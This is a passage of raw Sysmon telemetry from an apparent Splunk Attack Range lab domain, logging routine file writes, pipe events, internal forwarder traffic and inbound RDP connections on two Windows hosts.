Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D107016A57B597304C12EE5A82710B55,SHA256=3017BA855BA4CED9B0C52A4C984EC16D7F85AE27CD9A0AFFC288044F7ED08E69,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.476{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-62282-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7C4E7806761B0170350377DD0978F6,SHA256=BC11844BABDFE53D87C5A106555E345B541946BAED5BDA05E87E22AC8D3A13EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:06.883{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812A2CEE96B0BC5657727127FA62315B,SHA256=D68BB85617BEFF62EC07B22D25E6DD24A4852846CF53CAF16FED03B898EA591A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.241{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.194{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001048151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.194{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001048150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:51:06.194{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.372.164343716C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001048149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:51:06.194{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.372.164343716C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001048156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.794{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C227C27EC706740448572FF97CE0072E,SHA256=79F93F07EC12C0B0BDAC6498CFE9E0BBB2340EBC3B54846AF826700F03264926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:07.898{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA8A172FCD08C3CC6231348829B6AF6,SHA256=D0A2C95749982CBBD2DA71B41DA3D04F6EF6642358105749877F80B18E093B99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.310{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=9095167B378E8F96262921CF6C864383,SHA256=85AB5FCC73CB8B724D5B1D5ED0B5EE91E5C617D7D6ED74D3CA76F8602DA9D3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:08.914{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F800165A10CF893185180BC9E311B6,SHA256=42022999FC752DCD898B174271ADFFDB98386BBD4D894974A5393CE153D93E76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:08.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82A9567375CAEFC5C9E175B628E12E4D,SHA256=BA73713C30EE6E9832CF16142F16219F5BE57F6C50BF140595E3569A96B3DFE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:09.929{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0606FA6AC1270F3DB4FD78964115E00D,SHA256=B1E1A009B3C47FF6739646B695CA62320F915FEF691CA10ED39F1CCF404387B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:09.854{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD4ED62C082AB8EE17347D40523C414F,SHA256=12E1CFB22DF83B1922CA28A109FAE8F3EAAFA63B4C1D1255A249F2CF661017EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:08.359{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57248-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.876{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BAF384B683D925EBCAB9B405303E84,SHA256=BC18DFB5114F25167B4FCCE295B2718A257D9D2B003E450F6BF94CAFD23654A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:10.945{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793917611AB8B5A7F83F428A92A80197,SHA256=5BC01CD90F157DEB5326B70F17D739F7F291B78C87B5F4B4423CA313D2653304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=921653EED3603960A89B042310479257,SHA256=DBBD0B93A558067EFDEF430802F2D1EAF5639EB5EF9A234E445EC6B81D8813A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2DF203F7FD396B1E920FAE13CAAB40E4,SHA256=CC21EC9BF186EB38A27128824943C40CDF7925A48C46BCB7A82DC95A4AA40E1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8CA5C73F78179208B7C52EB46553C509,SHA256=64A2F9066F693397849E6FC262C466AE671B8F1945D9020BCFBC8B75FB1DDDC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=898A4B3AD08AAB0CBFB633ABC737241D,SHA256=2C906CDDE9D024E9E64895585E908A881F41C74EF88DEB6FA70A92A128BBD8F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4E78CADF655A97B9C33CFDA96B2E6248,SHA256=28082A58EDD8346DCD7D23C54090B052ACA8EF6A7AD57ACFEA47919F782DA130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7E8DA86E31156EE46B9E2BDEAAA57D26,SHA256=9C0467EECAEC09AB1852A371B289348E879922B855AA886FAEE73E6682348E13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=863739EAA029A51C5885CA2EAEC6853B,SHA256=1F4AC8EC13CB01021218AD87363D4D48C2D3FDC69C032000B0600974E1AF1F87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C1BD80F540360177BE1F63B70069E000,SHA256=82DA27EE5520CB18C87A333B58683A41EF9D78703E04F9393B78E41F3C05E12E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=02D63322908BD0CBED310CF5F41CFE73,SHA256=7BE42ADC30F6777F42F0886AEB29D884CA8EF817F89831314D664BF626EE7613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5ABCFEB02D35775FCE464C5125AD3011,SHA256=2508540170867C4C81217212CDEA424E1846AF80651FC742DD35ACB5A574DCA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FC59F17CBEF181C77CEF6AFC3DF41ABB,SHA256=D29BCE06721D7E8D9CC7C2CB679E1DBAAE917A818DCFD3DC0FE8EB7E8E5E1254,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:01.639{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51008-false10.0.1.12-8000- 23542300x80000000000000001048172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:11.891{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE16D3E926357C80C34372770E62CC86,SHA256=72385BD428B69FEE5AD0E4C2FE4094CF6AAE640A7BF0B5BC1C0AA73E6352F527,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:11.945{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A9F9EA652798E7D9855570D47B3022E,SHA256=A32984F45C10B584C2FC116A4C30EA0F1C5DDE7DDD6ECB18EFCAD5159E73B144,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:12.892{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14C7CF9FA928B0B43A004D3682E2F7D0,SHA256=ABC67DAC76D693F703B3791CE43760D0FEFC96D41012A01B0D3005A8D0881DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:12.961{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C17B1ECB8F1977918D2F84218F75C51,SHA256=A21C16C411F645770F99AB7711855A73A6D9EECCB12DB566D86CE97BC40F336B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:12.679{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=175C9FA0BF0ADBB0A96DEA26772075A9,SHA256=A6BFF3E7AA6793127A0CB5C45288A673BAF666B56675981477EBF496BDA0BF1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:12.679{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B379E6521A8CDF3E4E171AC1575CCB30,SHA256=939182739A5EF34F24BBE1ECF501F8651AB18DC188700691B23FAAB175A13080,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:11.276{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-33292-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:13.961{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58BE54D3D1538F66739570C18F03D408,SHA256=A9FFA1F4F3BFC30C34E97C124DF4D50DF9BABB491F58FFCDC73020A9302E6AAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:13.907{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087893DE1391A8B41A2C6A76C57215D8,SHA256=A02DA96E8C7F4ED76AC83408584B32C2CA3D42B43A465D365CC510755B0F6059,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:11.810{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57249-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001048177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:14.922{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F0E0A01136F45B9E4BEA4CD381C430E,SHA256=008C53F48E97E33475E1E2557FACD75E58CE9488C4EC81822D61FA53661D6738,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:14.323{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=F78E2DB5EB964255D138257A6663505D,SHA256=4603A96C0B4D40842F34E6571D38FCBC3523A7B032B4CB69F79B3488DF86DE62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:05.206{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57249-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001048180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:15.937{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E54ABB568BF1EA386BD691418B58C62C,SHA256=90EB02B00D3841B217CD8B93FD7717AA431E5076F6EC5CDF19058557CAEC8690,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:13.390{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57250-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000807344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:15.018{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3430546D3D11E9F5CF4190576881211,SHA256=4630B33AB101D03D52140BEBD540715FFA3FAEA55074198BE917AF8A99113FDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:15.406{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=211494739029E76066F63A62A8DA8075,SHA256=8F1710C66B605BB633773D1263556F03F99B03B11BF4309EECB53DD28CECE7EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:15.406{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B745DA195616D4A8D272BC6AE9FF05CC,SHA256=53BF429ACE66C6D37B9C70DDEED133FD146E60675C9B1E0C42A37BFB431E4A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:16.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FF803268FB4F50340E7FAEFD11093C1,SHA256=A43509EF69C2B1375EF2E60EB870304AF5E9836DEB2D95515C0B18A3042BE849,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51009-false10.0.1.12-8000- 23542300x8000000000000000807346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:16.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 